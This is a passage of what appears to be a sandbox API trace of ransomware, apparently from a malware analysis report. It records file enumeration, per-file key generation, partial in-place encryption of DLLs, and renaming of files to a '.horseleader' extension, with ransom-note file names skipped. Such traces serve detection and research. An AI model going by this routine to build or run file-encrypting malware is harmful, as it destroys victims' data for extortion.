UyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0226.060] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0226.060] CloseHandle (hObject=0x21c) returned 1 [0226.060] GetProcessHeap () returned 0x780000 [0226.060] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0226.060] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Filters", cAlternateFileName="")) returned 1 [0226.060] lstrcmpiW (lpString1="Filters", lpString2="Windows") returned -1 [0226.060] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters") returned 58 [0226.060] lstrcmpW (lpString1="Filters", lpString2=".") returned 1 [0226.060] lstrcmpW (lpString1="Filters", lpString2="..") returned 1 [0226.060] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0226.060] GetProcessHeap () returned 0x780000 [0226.060] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0226.060] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*") returned 60 [0226.060] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0226.063] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0226.063] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\.") returned 60 [0226.063] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0226.063] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5969b6f0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xd9df3dc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd9df3dc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="..", cAlternateFileName="")) returned 1 [0226.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0226.064] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\..") returned 61 [0226.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0226.064] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0226.064] lstrcmpiW (lpString1="msgfilt.dll", lpString2="Windows") returned -1 [0226.064] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0226.064] StrStrIW (lpFirst="msgfilt.dll", lpSrch=".horseleader") returned 0x0 [0226.064] lstrcmpW (lpString1="msgfilt.dll", lpString2="#Decrypt#.txt") returned 1 [0226.064] lstrcmpW (lpString1="msgfilt.dll", lpString2="_uninstalling_.png") returned 1 [0226.064] lstrlenW (lpString=".testttjffg") returned 11 [0226.064] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpSrch=".testttjffg") returned 0x0 [0226.064] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.064] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0226.066] StrStrW (lpFirst="msgfilt.dll", lpSrch=".txt") returned 0x0 [0226.066] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=38768) returned 1 [0226.066] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.069] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.069] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.070] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4770, lpOverlapped=0x0) returned 1 [0226.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb890, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.070] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4770, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4770, lpOverlapped=0x0) returned 1 [0226.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.070] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.071] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.071] CloseHandle (hObject=0x158) returned 1 [0226.071] GetProcessHeap () returned 0x780000 [0226.071] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.071] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.horseleader") returned 82 [0226.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.horseleader")) returned 1 [0226.072] GetProcessHeap () returned 0x780000 [0226.072] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.072] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0226.072] lstrcmpiW (lpString1="odffilt.dll", lpString2="Windows") returned -1 [0226.072] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0226.072] StrStrIW (lpFirst="odffilt.dll", lpSrch=".horseleader") returned 0x0 [0226.072] lstrcmpW (lpString1="odffilt.dll", lpString2="#Decrypt#.txt") returned 1 [0226.072] lstrcmpW (lpString1="odffilt.dll", lpString2="_uninstalling_.png") returned 1 [0226.072] lstrlenW (lpString=".testttjffg") returned 11 [0226.072] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpSrch=".testttjffg") returned 0x0 [0226.072] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.072] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0226.074] StrStrW (lpFirst="odffilt.dll", lpSrch=".txt") returned 0x0 [0226.074] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1312656) returned 1 [0226.074] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.074] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.076] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.077] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.078] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x9dbc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.078] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.080] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.080] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.080] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x13b790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.080] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.092] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.092] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.092] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.092] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.093] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.093] CloseHandle (hObject=0x158) returned 1 [0226.093] GetProcessHeap () returned 0x780000 [0226.093] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.093] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.horseleader") returned 82 [0226.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.horseleader")) returned 1 [0226.096] GetProcessHeap () returned 0x780000 [0226.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0226.096] lstrcmpiW (lpString1="offfiltx.dll", lpString2="Windows") returned -1 [0226.096] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0226.096] StrStrIW (lpFirst="offfiltx.dll", lpSrch=".horseleader") returned 0x0 [0226.096] lstrcmpW (lpString1="offfiltx.dll", lpString2="#Decrypt#.txt") returned 1 [0226.096] lstrcmpW (lpString1="offfiltx.dll", lpString2="_uninstalling_.png") returned 1 [0226.096] lstrlenW (lpString=".testttjffg") returned 11 [0226.097] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpSrch=".testttjffg") returned 0x0 [0226.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0226.133] StrStrW (lpFirst="offfiltx.dll", lpSrch=".txt") returned 0x0 [0226.133] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1486736) returned 1 [0226.133] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.133] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.136] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.136] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.137] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb2fc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.140] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x165f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.140] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.144] CloseHandle (hObject=0x158) returned 1 [0226.144] GetProcessHeap () returned 0x780000 [0226.144] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.144] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.horseleader") returned 83 [0226.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.horseleader")) returned 1 [0226.145] GetProcessHeap () returned 0x780000 [0226.145] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.145] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0226.145] lstrcmpiW (lpString1="VISFILT.DLL", lpString2="Windows") returned -1 [0226.145] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0226.145] StrStrIW (lpFirst="VISFILT.DLL", lpSrch=".horseleader") returned 0x0 [0226.145] lstrcmpW (lpString1="VISFILT.DLL", lpString2="#Decrypt#.txt") returned 1 [0226.145] lstrcmpW (lpString1="VISFILT.DLL", lpString2="_uninstalling_.png") returned 1 [0226.145] lstrlenW (lpString=".testttjffg") returned 11 [0226.145] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpSrch=".testttjffg") returned 0x0 [0226.145] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.145] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.146] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0226.147] StrStrW (lpFirst="VISFILT.DLL", lpSrch=".txt") returned 0x0 [0226.147] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2124664) returned 1 [0226.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.147] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.149] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.153] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x100dbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.153] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 